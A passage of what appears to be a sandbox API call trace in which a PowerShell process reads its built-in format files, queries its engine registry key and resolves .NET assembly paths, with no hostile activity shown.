	[0039.830] ReadFile (in: hFile=0x300, lpBuffer=0x23cde48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x23cde48*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0039.830] GetLastError () returned 0x0
	[0039.830] ReadFile (in: hFile=0x300, lpBuffer=0x23cde48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x23cde48*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0039.830] GetLastError () returned 0x0
	[0039.831] ReadFile (in: hFile=0x300, lpBuffer=0x23cde48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x23cde48*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0039.831] GetLastError () returned 0x0
	[0039.831] ReadFile (in: hFile=0x300, lpBuffer=0x23cde48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x23cde48*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0039.831] GetLastError () returned 0x0
	[0039.831] ReadFile (in: hFile=0x300, lpBuffer=0x23cde48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x23cde48*, lpNumberOfBytesRead=0x25e404*=0x9e2, lpOverlapped=0x0) returned 1
	[0039.831] GetLastError () returned 0x0
	[0039.831] ReadFile (in: hFile=0x300, lpBuffer=0x23cd3ca, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x23cd3ca*, lpNumberOfBytesRead=0x25e404*=0x0, lpOverlapped=0x0) returned 1
	[0039.831] GetLastError () returned 0x0
	[0039.831] ReadFile (in: hFile=0x300, lpBuffer=0x23cde48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x23cde48*, lpNumberOfBytesRead=0x25e404*=0x0, lpOverlapped=0x0) returned 1
	[0039.831] GetLastError () returned 0x0
	[0039.832] CloseHandle (hObject=0x300) returned 1
	[0039.832] GetLastError () returned 0x0
	[0039.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0039.832] GetLastError () returned 0x0
	[0039.832] SetErrorMode (uMode=0x1) returned 0x1
	[0039.832] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23def04 | out: lpFileInformation=0x23def04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0039.832] GetLastError () returned 0x0
	[0039.832] SetErrorMode (uMode=0x1) returned 0x1
	[0039.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0039.832] GetLastError () returned 0x0
	[0039.832] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x300) returned 0x0
	[0039.832] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e3d0, lpData=0x0, lpcbData=0x25e3cc*=0x0 | out: lpType=0x25e3d0*=0x1, lpData=0x0, lpcbData=0x25e3cc*=0x56) returned 0x0
	[0039.832] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e3d0, lpData=0x190b58, lpcbData=0x25e3cc*=0x56 | out: lpType=0x25e3d0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25e3cc*=0x56) returned 0x0
	[0039.833] RegCloseKey (hKey=0x300) returned 0x0
	[0039.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0039.833] GetLastError () returned 0x0
	[0039.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0039.833] GetLastError () returned 0x0
	[0039.856] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x364592d8, Data2=0xa332, Data3=0x4998, Data4=([0]=0xa4, [1]=0x1b, [2]=0xd, [3]=0x93, [4]=0xf0, [5]=0x5a, [6]=0x81, [7]=0xdb))) returned 0x0
	[0039.877] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x693d5b3d, Data2=0xe4da, Data3=0x46ec, Data4=([0]=0x9b, [1]=0x77, [2]=0xe3, [3]=0x97, [4]=0x27, [5]=0xfb, [6]=0x21, [7]=0xa4))) returned 0x0
	[0039.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0039.879] GetLastError () returned 0x0
	[0039.879] SetErrorMode (uMode=0x1) returned 0x1
	[0039.879] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0039.879] GetLastError () returned 0x0
	[0039.879] GetFileType (hFile=0x300) returned 0x1
	[0039.879] SetErrorMode (uMode=0x1) returned 0x1
	[0039.879] GetFileType (hFile=0x300) returned 0x1
	[0039.880] ReadFile (in: hFile=0x300, lpBuffer=0x23f21ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x23f21ec*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0039.882] GetLastError () returned 0x0
	[0039.882] ReadFile (in: hFile=0x300, lpBuffer=0x23f21ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x23f21ec*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0039.883] GetLastError () returned 0x0
	[0039.883] ReadFile (in: hFile=0x300, lpBuffer=0x23f21ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x23f21ec*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0039.883] GetLastError () returned 0x0
	[0039.884] ReadFile (in: hFile=0x300, lpBuffer=0x23f21ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x23f21ec*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0039.884] GetLastError () returned 0x0
	[0039.884] ReadFile (in: hFile=0x300, lpBuffer=0x23f21ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x23f21ec*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0039.884] GetLastError () returned 0x0
	[0039.886] ReadFile (in: hFile=0x300, lpBuffer=0x23f21ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x23f21ec*, lpNumberOfBytesRead=0x25e404*=0xfb2, lpOverlapped=0x0) returned 1
	[0039.886] GetLastError () returned 0x0
	[0039.886] ReadFile (in: hFile=0x300, lpBuffer=0x23f193e, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x23f193e*, lpNumberOfBytesRead=0x25e404*=0x0, lpOverlapped=0x0) returned 1
	[0039.886] GetLastError () returned 0x0
	[0039.886] ReadFile (in: hFile=0x300, lpBuffer=0x23f21ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x23f21ec*, lpNumberOfBytesRead=0x25e404*=0x0, lpOverlapped=0x0) returned 1
	[0039.886] GetLastError () returned 0x0
	[0039.886] CloseHandle (hObject=0x300) returned 1
	[0039.886] GetLastError () returned 0x0
	[0039.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0039.887] GetLastError () returned 0x0
	[0039.887] SetErrorMode (uMode=0x1) returned 0x1
	[0039.887] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2412a7c | out: lpFileInformation=0x2412a7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0039.887] GetLastError () returned 0x0
	[0039.887] SetErrorMode (uMode=0x1) returned 0x1
	[0039.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0039.887] GetLastError () returned 0x0
	[0039.887] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x300) returned 0x0
	[0039.887] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e3d0, lpData=0x0, lpcbData=0x25e3cc*=0x0 | out: lpType=0x25e3d0*=0x1, lpData=0x0, lpcbData=0x25e3cc*=0x56) returned 0x0
	[0039.887] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e3d0, lpData=0x190b58, lpcbData=0x25e3cc*=0x56 | out: lpType=0x25e3d0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25e3cc*=0x56) returned 0x0
	[0039.888] RegCloseKey (hKey=0x300) returned 0x0
	[0039.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0039.888] GetLastError () returned 0x0
	[0039.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0039.888] GetLastError () returned 0x0
	[0039.890] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x99407bc, Data2=0x8ac4, Data3=0x4f30, Data4=([0]=0xbb, [1]=0x23, [2]=0x3c, [3]=0x43, [4]=0xb7, [5]=0xd2, [6]=0xe6, [7]=0x77))) returned 0x0
	[0039.899] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x98cd1bac, Data2=0x4482, Data3=0x4806, Data4=([0]=0xa3, [1]=0x3, [2]=0x66, [3]=0x67, [4]=0x2d, [5]=0x19, [6]=0x9b, [7]=0x38))) returned 0x0
	[0039.906] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0xccc71afc, Data2=0xa71d, Data3=0x46e9, Data4=([0]=0x97, [1]=0x13, [2]=0xc5, [3]=0x66, [4]=0x4d, [5]=0x1b, [6]=0x1a, [7]=0x12))) returned 0x0
	[0039.906] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x1cfd7056, Data2=0xe5db, Data3=0x4f80, Data4=([0]=0x84, [1]=0x47, [2]=0x76, [3]=0xd3, [4]=0x5e, [5]=0x71, [6]=0xf, [7]=0xc8))) returned 0x0
	[0039.907] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x6c509266, Data2=0x8985, Data3=0x4746, Data4=([0]=0xbc, [1]=0x51, [2]=0x29, [3]=0x62, [4]=0x19, [5]=0xe1, [6]=0x6c, [7]=0x70))) returned 0x0
	[0039.907] CoCreateGuid (in: pguid=0x25e3f8 | out: pguid=0x25e3f8*(Data1=0x6f6c68b4, Data2=0x4c44, Data3=0x4262, Data4=([0]=0xa2, [1]=0x8d, [2]=0x39, [3]=0xd4, [4]=0xb, [5]=0xa6, [6]=0xd7, [7]=0xb8))) returned 0x0
	[0039.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25de9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0039.907] GetLastError () returned 0x0
	[0039.907] SetErrorMode (uMode=0x1) returned 0x1
	[0039.907] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0039.908] GetLastError () returned 0x0
	[0039.908] GetFileType (hFile=0x300) returned 0x1
	[0039.908] SetErrorMode (uMode=0x1) returned 0x1
	[0039.908] GetFileType (hFile=0x300) returned 0x1
	[0039.908] ReadFile (in: hFile=0x300, lpBuffer=0x2432424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x2432424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0039.910] GetLastError () returned 0x0
	[0039.911] ReadFile (in: hFile=0x300, lpBuffer=0x2432424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x2432424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0039.911] GetLastError () returned 0x0
	[0039.912] ReadFile (in: hFile=0x300, lpBuffer=0x2432424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x2432424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0039.912] GetLastError () returned 0x0
	[0039.913] ReadFile (in: hFile=0x300, lpBuffer=0x2432424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x2432424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0039.913] GetLastError () returned 0x0
	[0039.914] ReadFile (in: hFile=0x300, lpBuffer=0x2432424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x2432424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0039.914] GetLastError () returned 0x0
	[0039.914] ReadFile (in: hFile=0x300, lpBuffer=0x2432424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x2432424*, lpNumberOfBytesRead=0x25e404*=0x1000, lpOverlapped=0x0) returned 1
	[0039.914] GetLastError () returned 0x0
	[0039.914] ReadFile (in: hFile=0x300, lpBuffer=0x2432424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x2432424*, lpNumberOfBytesRead=0x25e404*=0xaca, lpOverlapped=0x0) returned 1
	[0039.914] GetLastError () returned 0x0
	[0039.914] ReadFile (in: hFile=0x300, lpBuffer=0x2431a8e, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x2431a8e*, lpNumberOfBytesRead=0x25e404*=0x0, lpOverlapped=0x0) returned 1
	[0039.915] GetLastError () returned 0x0
	[0039.915] ReadFile (in: hFile=0x300, lpBuffer=0x2432424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e404, lpOverlapped=0x0 | out: lpBuffer=0x2432424*, lpNumberOfBytesRead=0x25e404*=0x0, lpOverlapped=0x0) returned 1
	[0039.915] GetLastError () returned 0x0
	[0039.915] CloseHandle (hObject=0x300) returned 1
	[0039.915] GetLastError () returned 0x0
	[0039.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0039.915] GetLastError () returned 0x0
	[0039.915] SetErrorMode (uMode=0x1) returned 0x1
	[0039.915] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2453420 | out: lpFileInformation=0x2453420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0039.915] GetLastError () returned 0x0
	[0039.915] SetErrorMode (uMode=0x1) returned 0x1
	[0039.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0039.915] GetLastError () returned 0x0
	[0039.915] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e388 | out: phkResult=0x25e388*=0x300) returned 0x0
	[0039.916] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e3d0, lpData=0x0, lpcbData=0x25e3cc*=0x0 | out: lpType=0x25e3d0*=0x1, lpData=0x0, lpcbData=0x25e3cc*=0x56) returned 0x0
	[0039.916] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e3d0, lpData=0x190b58, lpcbData=0x25e3cc*=0x56 | out: lpType=0x25e3d0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25e3cc*=0x56) returned 0x0
	[0039.916] RegCloseKey (hKey=0x300) returned 0x0
	[0039.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25df30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0039.916] GetLastError () returned 0x0
	[0039.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x25dec4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0039.916] GetLastError () returned 0x0
	[0039.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0039.934] GetLastError () returned 0x0
	[0039.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0039.936] GetLastError () returned 0x57
	[0039.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0039.946] GetLastError () returned 0x57
	[0039.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0039.955] GetLastError () returned 0x57
	[0039.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0039.965] GetLastError () returned 0x57
	[0039.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0039.974] GetLastError () returned 0x57
	[0039.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0039.984] GetLastError () returned 0x57
	[0039.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0039.993] GetLastError () returned 0x57
	[0040.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0040.002] GetLastError () returned 0x57
	[0040.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0040.012] GetLastError () returned 0x57
	[0040.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0040.021] GetLastError () returned 0x57
	[0040.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0040.030] GetLastError () returned 0x57
	[0040.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x25dbf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0040.052] GetLastError () returned 0x57
